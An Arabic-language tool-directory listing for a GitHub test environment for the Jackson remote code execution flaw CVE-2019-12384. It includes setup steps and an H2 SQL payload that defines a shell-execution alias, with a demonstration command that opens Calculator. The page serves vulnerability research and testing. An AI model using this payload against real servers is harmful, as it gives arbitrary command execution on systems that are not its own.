Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Jackson_RCE-CVE-2019-12384 — بيئة اختبار الثغرة CVE-2019-12384 | Kitploit
أدوات/GitHubGitHub/magiczer0/jackson_rce-cve-2019-12384
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHubmagiczer0/jackson_rce-cve-2019-12384

Jackson_RCE-CVE-2019-12384

بيئة اختبار الثغرة CVE-2019-12384

عرض المستودع
2145منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إعداد البيئة

قم باستيراد المشروع إلى IDEA، وبعد تكوين Maven، اضبط الاستيراد التلقائي للمكتبات التابعة، ثم اكتب الملف التالي في دليل ويب فارغ محلي واحفظه باسم exec.sql. وقم بتشغيل خادم http:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"/bin/bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
    return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')

يرجى ملاحظة تعديل الأجزاء المقابلة في الكود لتكييفه مع بيئات أنظمة التشغيل المختلفة.

نتائج التشغيل

يمكن رؤية ظهور الآلة الحاسبة.

مراجع الثغرة

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

https://www.anquanke.com/post/id/182695

تنزيل الأداة